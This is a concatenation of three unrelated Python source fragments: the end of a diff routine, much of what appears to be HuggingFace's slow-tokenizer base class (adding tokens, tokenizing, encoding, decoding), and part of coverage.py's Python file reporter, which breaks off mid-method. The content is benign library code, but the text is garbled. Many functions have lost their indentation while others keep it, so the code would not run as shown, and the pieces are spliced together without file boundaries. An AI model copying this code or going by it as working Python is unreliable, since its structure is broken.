        # Raw tokens become Deletes; matched segments were moved, not
        # removed, so they only advance the 'a' cursor.
        removed_token_count = 0
        for t_s in self.a_token_segments[op.a1:op.a2]:
            if isinstance(t_s, Token):
                removed_token_count += 1
            else:  # Found a matched token... not removed -- just moved
                segment = t_s
                if removed_token_count > 0:
                    a1 = self.a_pos
                    self.a_pos += removed_token_count
                    yield Delete(a1, self.a_pos, self.b_pos, self.b_pos)
                    removed_token_count = 0
                # update & reset!
                self.a_pos += sum(1 for _ in segment.tokens())
        # cleanup
        if removed_token_count > 0:
            a1 = self.a_pos
            self.a_pos += removed_token_count
            yield Delete(a1, self.a_pos, self.b_pos, self.b_pos)
| |
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tokenization classes for python tokenizers. For fast tokenizers (provided by HuggingFace's tokenizers library) see
tokenization_utils_fast.py
"""
import bisect
import itertools
import re
import unicodedata
from typing import Any, Dict, List, Optional, Tuple, Union, overload
from .file_utils import PaddingStrategy, TensorType, add_end_docstrings
from .tokenization_utils_base import (
ENCODE_KWARGS_DOCSTRING,
ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING,
INIT_TOKENIZER_DOCSTRING,
AddedToken,
BatchEncoding,
EncodedInput,
EncodedInputPair,
PreTokenizedInput,
PreTokenizedInputPair,
PreTrainedTokenizerBase,
TextInput,
TextInputPair,
TruncationStrategy,
)
from .utils import logging
# Module-level logger for this file.
logger = logging.get_logger(__name__)
# Slow tokenizers are saved in a vocabulary plus three separated files
SPECIAL_TOKENS_MAP_FILE = "special_tokens_map.json"
ADDED_TOKENS_FILE = "added_tokens.json"
TOKENIZER_CONFIG_FILE = "tokenizer_config.json"
def _is_whitespace(char):
"""Checks whether `char` is a whitespace character."""
# \t, \n, and \r are technically control characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `char` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `char` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
def _is_end_of_word(text):
    """Checks whether the last character in text is one of a punctuation, control or whitespace character."""
    last_char = text[-1]
    return bool(_is_control(last_char) or _is_punctuation(last_char) or _is_whitespace(last_char))
def _is_start_of_word(text):
    """Checks whether the first character in text is one of a punctuation, control or whitespace character."""
    first_char = text[0]
    return bool(_is_control(first_char) or _is_punctuation(first_char) or _is_whitespace(first_char))
def _insert_one_token_to_ordered_list(token_list: List[str], new_token: str):
"""
Inserts one token to an ordered list if it does not already exist. Note: token_list must be sorted.
"""
insertion_idx = bisect.bisect_left(token_list, new_token)
# Checks if new_token is already in the ordered token_list
if insertion_idx < len(token_list) and token_list[insertion_idx] == new_token:
# new_token is in token_list, don't add
return
else:
token_list.insert(insertion_idx, new_token)
@add_end_docstrings(INIT_TOKENIZER_DOCSTRING)
class PreTrainedTokenizer(PreTrainedTokenizerBase):
"""
Base class for all slow tokenizers.
Inherits from :class:`~transformers.tokenization_utils_base.PreTrainedTokenizerBase`.
Handle all the shared methods for tokenization and special tokens as well as methods downloading/caching/loading
pretrained tokenizers as well as adding tokens to the vocabulary.
This class also contain the added tokens in a unified way on top of all tokenizers so we don't have to handle the
specific vocabulary augmentation methods of the various underlying dictionary structures (BPE, sentencepiece...).
"""
    def __init__(self, **kwargs):
        """Initialize the slow tokenizer, forwarding all kwargs to the base class."""
        super().__init__(**kwargs)
        # Added tokens - We store this for both slow and fast tokenizers
        # until the serialization of Fast tokenizers is updated
        self.added_tokens_encoder: Dict[str, int] = {}  # token string -> id
        self.added_tokens_decoder: Dict[int, str] = {}  # id -> token string
        # tokens that must never be split by the tokenization pre-processing
        self.unique_no_split_tokens: List[str] = []
        self._decode_use_source_tokenizer = False
    @property
    def is_fast(self) -> bool:
        # Slow (pure python) tokenizers always report False here.
        return False
    @property
    def vocab_size(self) -> int:
        """
        :obj:`int`: Size of the base vocabulary (without the added tokens).

        Must be implemented by each concrete tokenizer subclass.
        """
        raise NotImplementedError
    def get_added_vocab(self) -> Dict[str, int]:
        """
        Returns the added tokens in the vocabulary as a dictionary of token to index.

        Returns:
            :obj:`Dict[str, int]`: The added tokens.
        """
        return self.added_tokens_encoder
    def __len__(self):
        """
        Size of the full vocabulary with the added tokens.
        """
        # base vocabulary plus every token added on top of it
        return self.vocab_size + len(self.added_tokens_encoder)
    def _add_tokens(self, new_tokens: Union[List[str], List[AddedToken]], special_tokens: bool = False) -> int:
        """
        Add a list of new tokens to the tokenizer class. If the new tokens are not in the vocabulary, they are added to
        it with indices starting from length of the current vocabulary.

        Args:
            new_tokens (:obj:`List[str]`or :obj:`List[tokenizers.AddedToken]`):
                Token(s) to add in vocabulary. A token is only added if it's not already in the vocabulary (tested by
                checking if the tokenizer assign the index of the ``unk_token`` to them).
            special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
                Whether or not the tokens should be added as special tokens.

        Returns:
            :obj:`int`: The number of tokens actually added to the vocabulary.

        Examples::

            # Let's see how to increase the vocabulary of Bert model and tokenizer
            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertModel.from_pretrained('bert-base-uncased')

            num_added_toks = tokenizer.add_tokens(['new_tok1', 'my_new-tok2'])
            print('We have added', num_added_toks, 'tokens')
            # Note: resize_token_embeddings expects to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
            model.resize_token_embeddings(len(tokenizer))
        """
        # AddedToken instances are coerced to their plain string form here.
        new_tokens = [str(tok) for tok in new_tokens]
        tokens_to_add = []
        for token in new_tokens:
            assert isinstance(token, str)
            # lowercase non-special tokens when the tokenizer is lowercasing
            if not special_tokens and hasattr(self, "do_lower_case") and self.do_lower_case:
                token = token.lower()
            # keep only tokens that are genuinely unknown to the vocabulary
            # (they map to the unk_token id) and not already queued
            if (
                token != self.unk_token
                and self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)
                and token not in tokens_to_add
            ):
                tokens_to_add.append(token)
                if self.verbose:
                    logger.info(f"Adding {token} to the vocabulary")
        # ids for the new tokens start right after the current full vocabulary
        added_tok_encoder = dict((tok, len(self) + i) for i, tok in enumerate(tokens_to_add))
        added_tok_decoder = {v: k for k, v in added_tok_encoder.items()}
        self.added_tokens_encoder.update(added_tok_encoder)
        self.added_tokens_decoder.update(added_tok_decoder)
        # Make sure we don't split on any special tokens (even they were already in the vocab before e.g. for Albert)
        if special_tokens:
            if len(new_tokens) == 1:
                _insert_one_token_to_ordered_list(self.unique_no_split_tokens, new_tokens[0])
            else:
                self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(new_tokens)))
        else:
            # Or on the newly added tokens
            if len(tokens_to_add) == 1:
                _insert_one_token_to_ordered_list(self.unique_no_split_tokens, tokens_to_add[0])
            else:
                self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(tokens_to_add)))
        return len(tokens_to_add)
def num_special_tokens_to_add(self, pair: bool = False) -> int:
"""
Returns the number of added tokens when encoding a sequence with special tokens.
.. note::
This encodes a dummy input and checks the number of added tokens, and is therefore not efficient. Do not
put this inside your training loop.
Args:
pair (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether the number of added tokens should be computed in the case of a sequence pair or a single
sequence.
Returns:
:obj:`int`: Number of special tokens added to sequences.
"""
token_ids_0 = []
token_ids_1 = []
return len(self.build_inputs_with_special_tokens(token_ids_0, token_ids_1 if pair else None))
    def tokenize(self, text: TextInput, **kwargs) -> List[str]:
        """
        Converts a string in a sequence of tokens, using the tokenizer.
        Split in words for word-based vocabulary or sub-words for sub-word-based vocabularies
        (BPE/SentencePieces/WordPieces). Takes care of added tokens.
        Args:
            text (:obj:`str`):
                The sequence to be encoded.
            **kwargs (additional keyword arguments):
                Passed along to the model-specific ``prepare_for_tokenization`` preprocessing method.
        Returns:
            :obj:`List[str]`: The list of tokens.
        """
        # Simple mapping string => AddedToken for special tokens with specific tokenization behaviors
        all_special_tokens_extended = dict(
            (str(t), t) for t in self.all_special_tokens_extended if isinstance(t, AddedToken)
        )
        text, kwargs = self.prepare_for_tokenization(text, **kwargs)
        if kwargs:
            logger.warning(f"Keyword arguments {kwargs} not recognized.")
        # TODO: should this be in the base class?
        if hasattr(self, "do_lower_case") and self.do_lower_case:
            # convert non-special tokens to lowercase
            escaped_special_toks = [re.escape(s_tok) for s_tok in self.all_special_tokens]
            # Alternation: group 1 matches a whole special token, group 2 any other text;
            # only group 2 is lowercased, so special tokens keep their exact casing.
            pattern = r"(" + r"|".join(escaped_special_toks) + r")|" + r"(.+?)"
            text = re.sub(pattern, lambda m: m.groups()[0] or m.groups()[1].lower(), text)
        def split_on_token(tok, text):
            # Split `text` on the single no-split token `tok`, keeping `tok` itself in
            # the output and honoring the AddedToken lstrip/rstrip/single_word flags.
            result = []
            tok_extended = all_special_tokens_extended.get(tok, None)
            split_text = text.split(tok)
            full_word = ""
            for i, sub_text in enumerate(split_text):
                # AddedToken can control whitespace stripping around them.
                # We use them for GPT2 and Roberta to have different behavior depending on the special token
                # Cf. https://github.com/huggingface/transformers/pull/2778
                # and https://github.com/huggingface/transformers/issues/3788
                if isinstance(tok_extended, AddedToken):
                    if tok_extended.single_word:
                        # Try to avoid splitting on token
                        if (
                            i < len(split_text) - 1
                            and not _is_end_of_word(sub_text)
                            and not _is_start_of_word(split_text[i + 1])
                        ):
                            # Don't extract the special token
                            full_word += sub_text + tok
                        elif full_word:
                            full_word += sub_text
                            result.append(full_word)
                            full_word = ""
                            continue
                    # Strip white spaces on the right
                    if tok_extended.rstrip and i > 0:
                        # A bit counter-intuitive but we strip the left of the string
                        # since tok_extended.rstrip means the special token is eating all white spaces on its right
                        sub_text = sub_text.lstrip()
                    # Strip white spaces on the left
                    if tok_extended.lstrip and i < len(split_text) - 1:
                        sub_text = sub_text.rstrip()  # Opposite here
                else:
                    # We strip left and right by default
                    if i < len(split_text) - 1:
                        sub_text = sub_text.rstrip()
                    if i > 0:
                        sub_text = sub_text.lstrip()
                if i == 0 and not sub_text:
                    result.append(tok)
                elif i == len(split_text) - 1:
                    if sub_text:
                        result.append(sub_text)
                    else:
                        pass
                else:
                    if sub_text:
                        result.append(sub_text)
                    result.append(tok)
            return result
        def split_on_tokens(tok_list, text):
            # Repeatedly split `text` on every no-split token, then run the model's
            # `_tokenize` on the remaining plain-text fragments only.
            if not text.strip():
                return []
            if not tok_list:
                return self._tokenize(text)
            tokenized_text = []
            text_list = [text]
            for tok in tok_list:
                tokenized_text = []
                for sub_text in text_list:
                    if sub_text not in self.unique_no_split_tokens:
                        tokenized_text.extend(split_on_token(tok, sub_text))
                    else:
                        tokenized_text.append(sub_text)
                text_list = tokenized_text
            return list(
                itertools.chain.from_iterable(
                    (
                        self._tokenize(token) if token not in self.unique_no_split_tokens else [token]
                        for token in tokenized_text
                    )
                )
            )
        no_split_token = self.unique_no_split_tokens
        tokenized_text = split_on_tokens(no_split_token, text)
        return tokenized_text
def _tokenize(self, text, **kwargs):
"""
Converts a string in a sequence of tokens (string), using the tokenizer. Split in words for word-based
vocabulary or sub-words for sub-word-based vocabularies (BPE/SentencePieces/WordPieces).
Do NOT take care of added tokens.
"""
raise NotImplementedError
def convert_tokens_to_ids(self, tokens: Union[str, List[str]]) -> Union[int, List[int]]:
"""
Converts a token string (or a sequence of tokens) in a single integer id (or a sequence of ids), using the
vocabulary.
Args:
tokens (:obj:`str` or :obj:`List[str]`): One or several token(s) to convert to token id(s).
Returns:
:obj:`int` or :obj:`List[int]`: The token id or list of token ids.
"""
if tokens is None:
return None
if isinstance(tokens, str):
return self._convert_token_to_id_with_added_voc(tokens)
ids = []
for token in tokens:
ids.append(self._convert_token_to_id_with_added_voc(token))
return ids
def _convert_token_to_id_with_added_voc(self, token):
if token is None:
return None
if token in self.added_tokens_encoder:
return self.added_tokens_encoder[token]
return self._convert_token_to_id(token)
def _convert_token_to_id(self, token):
raise NotImplementedError
    def _encode_plus(
        self,
        text: Union[TextInput, PreTokenizedInput, EncodedInput],
        text_pair: Optional[Union[TextInput, PreTokenizedInput, EncodedInput]] = None,
        add_special_tokens: bool = True,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
        max_length: Optional[int] = None,
        stride: int = 0,
        is_split_into_words: bool = False,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs
    ) -> BatchEncoding:
        """
        Tokenize a single sequence (or sequence pair), convert it to ids, and delegate
        special tokens / truncation / padding / tensor conversion to
        ``prepare_for_model`` (with a batch axis prepended).
        """
        def get_input_ids(text):
            # Normalize the three accepted input forms -- raw string, list of token
            # strings (optionally pre-split into words), or list of ids -- into a
            # flat list of token ids.
            if isinstance(text, str):
                tokens = self.tokenize(text, **kwargs)
                return self.convert_tokens_to_ids(tokens)
            elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], str):
                if is_split_into_words:
                    tokens = list(
                        itertools.chain(*(self.tokenize(t, is_split_into_words=True, **kwargs) for t in text))
                    )
                    return self.convert_tokens_to_ids(tokens)
                else:
                    return self.convert_tokens_to_ids(text)
            elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], int):
                return text
            else:
                if is_split_into_words:
                    raise ValueError(
                        f"Input {text} is not valid. Should be a string or a list/tuple of strings when `is_split_into_words=True`."
                    )
                else:
                    raise ValueError(
                        f"Input {text} is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers."
                    )
        if return_offsets_mapping:
            # Character offsets are only tracked by the rust ("fast") tokenizers.
            raise NotImplementedError(
                "return_offset_mapping is not available when using Python tokenizers."
                "To use this feature, change your tokenizer to one deriving from "
                "transformers.PreTrainedTokenizerFast."
                "More information on available tokenizers at "
                "https://github.com/huggingface/transformers/pull/2674"
            )
        first_ids = get_input_ids(text)
        second_ids = get_input_ids(text_pair) if text_pair is not None else None
        return self.prepare_for_model(
            first_ids,
            pair_ids=second_ids,
            add_special_tokens=add_special_tokens,
            padding=padding_strategy.value,
            truncation=truncation_strategy.value,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_tensors=return_tensors,
            prepend_batch_axis=True,
            return_attention_mask=return_attention_mask,
            return_token_type_ids=return_token_type_ids,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_length=return_length,
            verbose=verbose,
        )
    def _batch_encode_plus(
        self,
        batch_text_or_text_pairs: Union[
            List[TextInput],
            List[TextInputPair],
            List[PreTokenizedInput],
            List[PreTokenizedInputPair],
            List[EncodedInput],
            List[EncodedInputPair],
        ],
        add_special_tokens: bool = True,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
        max_length: Optional[int] = None,
        stride: int = 0,
        is_split_into_words: bool = False,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs
    ) -> BatchEncoding:
        """
        Tokenize a batch of sequences (or sequence pairs), convert them to ids, and
        delegate truncation/padding/tensor conversion to ``_batch_prepare_for_model``.
        """
        def get_input_ids(text):
            # Normalize raw string / list of token strings / list of ids into a flat
            # list of token ids (same as in `_encode_plus`).
            if isinstance(text, str):
                tokens = self.tokenize(text, **kwargs)
                return self.convert_tokens_to_ids(tokens)
            elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], str):
                if is_split_into_words:
                    tokens = list(
                        itertools.chain(*(self.tokenize(t, is_split_into_words=True, **kwargs) for t in text))
                    )
                    return self.convert_tokens_to_ids(tokens)
                else:
                    return self.convert_tokens_to_ids(text)
            elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], int):
                return text
            else:
                raise ValueError(
                    "Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers."
                )
        if return_offsets_mapping:
            # Character offsets are only tracked by the rust ("fast") tokenizers.
            raise NotImplementedError(
                "return_offset_mapping is not available when using Python tokenizers."
                "To use this feature, change your tokenizer to one deriving from "
                "transformers.PreTrainedTokenizerFast."
            )
        input_ids = []
        for ids_or_pair_ids in batch_text_or_text_pairs:
            # A bare string is a single sequence; for pre-tokenized input a flat list
            # of words is also a single sequence; otherwise expect a (first, pair) 2-tuple.
            if not isinstance(ids_or_pair_ids, (list, tuple)):
                ids, pair_ids = ids_or_pair_ids, None
            elif is_split_into_words and not isinstance(ids_or_pair_ids[0], (list, tuple)):
                ids, pair_ids = ids_or_pair_ids, None
            else:
                ids, pair_ids = ids_or_pair_ids
            first_ids = get_input_ids(ids)
            second_ids = get_input_ids(pair_ids) if pair_ids is not None else None
            input_ids.append((first_ids, second_ids))
        batch_outputs = self._batch_prepare_for_model(
            input_ids,
            add_special_tokens=add_special_tokens,
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_attention_mask=return_attention_mask,
            return_token_type_ids=return_token_type_ids,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_length=return_length,
            return_tensors=return_tensors,
            verbose=verbose,
        )
        return BatchEncoding(batch_outputs)
    @add_end_docstrings(ENCODE_KWARGS_DOCSTRING, ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    def _batch_prepare_for_model(
        self,
        batch_ids_pairs: List[Union[PreTokenizedInputPair, Tuple[List[int], None]]],
        add_special_tokens: bool = True,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[str] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_length: bool = False,
        verbose: bool = True,
    ) -> BatchEncoding:
        """
        Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by the model. It
        adds special tokens, truncates sequences if overflowing while taking into account the special tokens and
        manages a moving window (with user defined stride) for overflowing tokens
        Args:
            batch_ids_pairs: list of tokenized input ids or input ids pairs
        """
        batch_outputs = {}
        for first_ids, second_ids in batch_ids_pairs:
            # Prepare each example individually WITHOUT padding or tensor conversion;
            # the whole batch is padded and converted in one pass below.
            outputs = self.prepare_for_model(
                first_ids,
                second_ids,
                add_special_tokens=add_special_tokens,
                padding=PaddingStrategy.DO_NOT_PAD.value,  # we pad in batch afterward
                truncation=truncation_strategy.value,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=None,  # we pad in batch afterward
                return_attention_mask=False,  # we pad in batch afterward
                return_token_type_ids=return_token_type_ids,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_length=return_length,
                return_tensors=None,  # We convert the whole batch to tensors at the end
                prepend_batch_axis=False,
                verbose=verbose,
            )
            # Accumulate per-key lists: {key: [example0_value, example1_value, ...]}.
            for key, value in outputs.items():
                if key not in batch_outputs:
                    batch_outputs[key] = []
                batch_outputs[key].append(value)
        batch_outputs = self.pad(
            batch_outputs,
            padding=padding_strategy.value,
            max_length=max_length,
            pad_to_multiple_of=pad_to_multiple_of,
            return_attention_mask=return_attention_mask,
        )
        batch_outputs = BatchEncoding(batch_outputs, tensor_type=return_tensors)
        return batch_outputs
def prepare_for_tokenization(
self, text: str, is_split_into_words: bool = False, **kwargs
) -> Tuple[str, Dict[str, Any]]:
"""
Performs any necessary transformations before tokenization.
This method should pop the arguments from kwargs and return the remaining :obj:`kwargs` as well. We test the
:obj:`kwargs` at the end of the encoding process to be sure all the arguments have been used.
Args:
text (:obj:`str`):
The text to prepare.
is_split_into_words (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the input is already pre-tokenized (e.g., split into words). If set to :obj:`True`, the
tokenizer assumes the input is already split into words (for instance, by splitting it on whitespace)
which it will tokenize. This is useful for NER or token classification.
kwargs:
Keyword arguments to use for the tokenization.
Returns:
:obj:`Tuple[str, Dict[str, Any]]`: The prepared text and the unused kwargs.
"""
return (text, kwargs)
def get_special_tokens_mask(
self, token_ids_0: List, token_ids_1: Optional[List] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods.
Args:
token_ids_0 (:obj:`List[int]`):
List of ids of the first sequence.
token_ids_1 (:obj:`List[int]`, `optional`):
List of ids of the second sequence.
already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formatted with special tokens for the model."
)
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
return [0] * ((len(token_ids_1) if token_ids_1 else 0) + len(token_ids_0))
@overload
def convert_ids_to_tokens(self, ids: int, skip_special_tokens: bool = False) -> str:
...
@overload
def convert_ids_to_tokens(self, ids: List[int], skip_special_tokens: bool = False) -> List[str]:
...
def convert_ids_to_tokens(
self, ids: Union[int, List[int]], skip_special_tokens: bool = False
) -> Union[str, List[str]]:
"""
Converts a single index or a sequence of indices in a token or a sequence of tokens, using the vocabulary and
added tokens.
Args:
ids (:obj:`int` or :obj:`List[int]`):
The token id (or token ids) to convert to tokens.
skip_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to remove special tokens in the decoding.
Returns:
:obj:`str` or :obj:`List[str]`: The decoded token(s).
"""
if isinstance(ids, int):
if ids in self.added_tokens_decoder:
return self.added_tokens_decoder[ids]
else:
return self._convert_id_to_token(ids)
tokens = []
for index in ids:
index = int(index)
if skip_special_tokens and index in self.all_special_ids:
continue
if index in self.added_tokens_decoder:
tokens.append(self.added_tokens_decoder[index])
else:
tokens.append(self._convert_id_to_token(index))
return tokens
def _convert_id_to_token(self, index: int) -> str:
raise NotImplementedError
def convert_tokens_to_string(self, tokens: List[str]) -> str:
return " ".join(tokens)
def _decode(
self,
token_ids: List[int],
skip_special_tokens: bool = False,
clean_up_tokenization_spaces: bool = True,
spaces_between_special_tokens: bool = True,
**kwargs
) -> str:
self._decode_use_source_tokenizer = kwargs.pop("use_source_tokenizer", False)
filtered_tokens = self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens)
# To avoid mixing byte-level and unicode for byte-level BPT
# we need to build string separately for added tokens and byte-level tokens
# cf. https://github.com/huggingface/transformers/issues/1133
sub_texts = []
current_sub_text = []
for token in filtered_tokens:
if skip_special_tokens and token in self.all_special_ids:
continue
if token in self.added_tokens_encoder:
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
current_sub_text = []
sub_texts.append(token)
else:
current_sub_text.append(token)
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
if spaces_between_special_tokens:
text = " ".join(sub_texts)
else:
text = "".join(sub_texts)
if clean_up_tokenization_spaces:
clean_text = self.clean_up_tokenization(text)
return clean_text
else:
return text
| |
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Python source expertise for coverage.py"""
import os.path
import types
import zipimport
from coverage import env, files
from coverage.misc import (
contract, CoverageException, expensive, NoSource, join_regex, isolate_module,
)
from coverage.parser import PythonParser
from coverage.phystokens import source_token_lines, source_encoding
from coverage.plugin import FileReporter
# Re-bind `os` to an isolated copy -- presumably so that tests which monkey-patch
# the real `os` module don't disturb coverage.py's own use of it (see
# coverage.misc.isolate_module; TODO confirm semantics there).
os = isolate_module(os)
@contract(returns='bytes')
def read_python_source(filename):
    """Read the Python source text from `filename`.

    Returns bytes, with Windows ("\\r\\n") and old-Mac ("\\r") line endings
    normalized to "\\n".
    """
    with open(filename, "rb") as source_file:
        raw = source_file.read()
    return raw.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
@contract(returns='unicode')
def get_python_source(filename):
    """Return the source code, as unicode."""
    base, ext = os.path.splitext(filename)
    if ext == ".py" and env.WINDOWS:
        # On Windows the file may exist with a .pyw extension instead of .py.
        exts = [".py", ".pyw"]
    else:
        exts = [ext]
    for ext in exts:
        try_filename = base + ext
        if os.path.exists(try_filename):
            # A regular text file: open it.
            source = read_python_source(try_filename)
            break
        # Maybe it's in a zip file?
        source = get_zip_bytes(try_filename)
        if source is not None:
            break
    else:
        # for/else: the loop finished without `break`, so no candidate was found.
        # Couldn't find source.
        exc_msg = "No source for code: '%s'.\n" % (filename,)
        exc_msg += "Aborting report output, consider using -i."
        raise NoSource(exc_msg)
    # Replace \f because of http://bugs.python.org/issue19035
    source = source.replace(b'\f', b' ')
    source = source.decode(source_encoding(source), "replace")
    # Python code should always end with a line with a newline.
    if source and source[-1] != '\n':
        source += '\n'
    return source
@contract(returns='bytes|None')
def get_zip_bytes(filename):
    """Get data from `filename` if it is a zip file path.

    Returns the bytestring data read from the zip file, or None if no zip file
    could be found or `filename` isn't in it. The data returned will be
    an empty string if the file is empty.
    """
    for marker in ('.zip' + os.sep, '.egg' + os.sep):
        if marker not in filename:
            continue
        pieces = filename.split(marker)
        # pieces[0] + marker (minus the trailing separator) is the archive path;
        # pieces[1] is the member path inside the archive.
        try:
            importer = zipimport.zipimporter(pieces[0] + marker[:-1])
        except zipimport.ZipImportError:
            continue
        try:
            return importer.get_data(pieces[1])
        except IOError:
            continue
    return None
class PythonFileReporter(FileReporter):
    """Report support for a Python file."""
    def __init__(self, morf, coverage=None):
        # `morf` is a module object or a file name.
        self.coverage = coverage
        if hasattr(morf, '__file__'):
            filename = morf.__file__
        elif isinstance(morf, types.ModuleType):
            # A module should have had .__file__, otherwise we can't use it.
            # This could be a PEP-420 namespace package.
            raise CoverageException("Module {0} has no file".format(morf))
        else:
            filename = morf
        filename = files.unicode_filename(filename)
        # .pyc files should always refer to a .py instead.
        if filename.endswith(('.pyc', '.pyo')):
            filename = filename[:-1]
        elif filename.endswith('$py.class'):  # Jython
            filename = filename[:-9] + ".py"
        super(PythonFileReporter, self).__init__(files.canonical_filename(filename))
        if hasattr(morf, '__name__'):
            # Prefer the dotted module name, rendered as a relative path.
            name = morf.__name__
            name = name.replace(".", os.sep) + ".py"
            name = files.unicode_filename(name)
        else:
            name = files.relative_filename(filename)
        self.relname = name
        # Lazily-populated caches.
        self._source = None
        self._parser = None
        self._statements = None
        self._excluded = None
    @contract(returns='unicode')
    def relative_filename(self):
        """Return the relative name computed in __init__."""
        return self.relname
    @property
    def parser(self):
        """Lazily create a :class:`PythonParser`."""
        if self._parser is None:
            self._parser = PythonParser(
                filename=self.filename,
                exclude=self.coverage._exclude_regex('exclude'),
            )
            self._parser.parse_source()
        return self._parser
    def lines(self):
        """Return the line numbers of statements in the file."""
        return self.parser.statements
    def excluded_lines(self):
        """Return the line numbers of excluded statements in the file."""
        return self.parser.excluded
    def translate_lines(self, lines):
        # Delegate line translation to the parser.
        return self.parser.translate_lines(lines)
    def translate_arcs(self, arcs):
        # Delegate arc translation to the parser.
        return self.parser.translate_arcs(arcs)
    @expensive
    def no_branch_lines(self):
        """Return the lines matched by the configured "partial branch" regexes."""
        no_branch = self.parser.lines_matching(
            join_regex(self.coverage.config.partial_list),
            join_regex(self.coverage.config.partial_always_list)
        )
        return no_branch
    @expensive
    def arcs(self):
        """Return the parser's arcs for the file."""
        return self.parser.arcs()
    @expensive
    def exit_counts(self):
        """Return the parser's exit counts for the file."""
        return self.parser.exit_counts()
    def missing_arc_description(self, start, end, executed_arcs=None):
        # Delegate to the parser.
        return self.parser.missing_arc_description(start, end, executed_arcs)
    @contract(returns='unicode')
    def source(self):
        """Return the source text, reading and caching it on first use."""
        if self._source is None:
            self._source = get_python_source(self.filename)
        return self._source
    def should_be_python(self):
        """Does it seem like this file should contain Python?
        This is used to decide if a file reported as part of the execution of
        a program was really likely to have contained Python in the first
        place.
        """
        # Get the file extension.
